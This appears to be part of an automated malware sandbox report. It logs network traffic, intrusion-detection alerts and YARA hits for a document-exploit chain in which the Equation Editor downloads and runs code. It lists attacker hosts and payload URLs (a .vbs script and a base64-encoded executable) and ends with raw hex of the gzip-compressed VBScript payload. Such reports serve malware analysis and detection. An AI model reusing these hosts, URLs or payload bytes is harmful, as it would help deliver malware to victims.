                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound : 87.121.86.105:80 -> 192.168.2.22:49163
                  Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 87.121.86.105:80 -> 192.168.2.22:49163
                  Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 87.121.86.105:80 -> 192.168.2.22:49163
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: Yara matchFile source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.72265d0.0.raw.unpack, type: UNPACKEDPE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035506AD URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035506AD
                  Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /emmabigssss.txt HTTP/1.1Host: 87.121.86.105Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: Joe Sandbox ViewASN Name: HUMBER-COLLEGECA HUMBER-COLLEGECA
                  Source: Joe Sandbox ViewASN Name: SKATTV-ASBG SKATTV-ASBG
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDNS query: name: ip-api.com
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDNS query: name: ip-api.com
                  Source: global trafficHTTP traffic detected: GET /cumconstraints.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.121.86.105Connection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49162 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.105
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035506AD URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035506AD
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/vbscriptContent-Encoding: gzipLast-Modified: Fri, 29 Nov 2024 15:28:58 GMTAccept-Ranges: bytesETag: "05988687342db1:0"Vary: Accept-EncodingServer: Microsoft-IIS/10.0Date: Sun, 01 Dec 2024 13:27:55 GMTContent-Length: 59333Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bc fd cf 92 f3 48 96 e6 07 c7 ee 33 93 d9 b7 d1 52 ab b2 32 59 4f b7 66 a6 2d 33 ab ab 55 2d 4d cb 0c 64 57 22 82 40 81 20 19 48 54 51 d6 0b 02 04 49 10 04 41 46 90 2c 26 6f 41 6b dd 83 16 ba 01 dd 87 16 bd e8 b1 b9 13 49 ee bf 73 00 77 66 55 b6 26 46 1a d9 6b ef 3f 06 08 38 dc 8f 9f f3 9c e7 fc f1 ff f3 ff f8 ff bf fc 17 2f bf d0 5f f6 df 4b f3 2b 7c a9 5f f2 97 d1 4b f9 72 7d a9 5e 2e e6 7f cb 97 ce 7c 12 9b 6b fe de fc fe a5 f9 57 f8 d2 f0 59 6d ae 9a bf 9c cd bf 8a 97 c0 7c 52 98 7f fd 92 3b 6d 5f 66 e6 ba e3 cb c3 fc ae cc a7 27 f3 bf ce 7c 1a 9b 6f d6 de 9d a6 e6 b7 fd 55 ea ef fc 65 67 7e 1e 99 ef 45 7a a7 d0 7c 9e 9a 6f 96 66 1c 07 f3 94 ca dc e7 fe 32 36 57 e6 2f 93 e1 4e f6 7f 8d f9 6e 67 46 63 c7 2f 23 5c 9b 3b d6 66 84 72 27 fb bb 34 3f 99 9a 9f 67 e6 9e ed cb ca bc e3 cd fc 9a 9a ab 23 ef 0d a7 e6 7f 81 f9 a6 7d a3 37 f3 79 c6 ac 94 e6 d9 b1 79 13 b9 db c6 dc c5 fe 7f 65 3e b7 cf 08 cd 27 a1 b9 a7 7d a7 d3 70 27 3b 9f 47 f3 59 c0 8c 46 e6 59 57 33 ca d8 fc 2b 37 6f 21 77 ba 98 6f 5d cc 08 1a 73 c5 c8 dc cb ce 6f ca f8 0e de 98 5a 3e 9f 98 6b 4a f3 a4 da cc d0 de dc 23 30 9f 55 e6 29 72 27 99 cb dc 5c 9b 98 bb 1f cd 55 21 33 f3 c6 1b f6 77 6a cc 1c 45 e6 d7 ca 8c c4 fe 34 35 6f b9 36 57 46 7c f7 97 2a 09 76 3d c6 ac d7 c5 5c 91 99 e7 9d cd d8 6b f3 9d 6c b8 d3 e3 65 61 e6 68 6a be 3b 36 cf 88 98 79 3b fe 82 39 96 3b a5 bc ed 83 39 b5 73 36 7b f9 30 23 8f f8 bc 1a ee 64 df aa e5 6d 72 73 af 3d b3 95 22 11 f6 97 dc e9 66 be 15 9a 51 af cd 7d 3e cc 28 c6 ac f2 c6 fc 7c e2 8d a9 34 ef be 33 23 7d f0 54 2b 15 76 2c f6 1b b9 19 6b 3f 4f 23 73 f7 c4 5c d1 9a 9f 6e cc 75 31 12 3a 37 bf 0e c3 9d 32 33 9e ad 19 e3 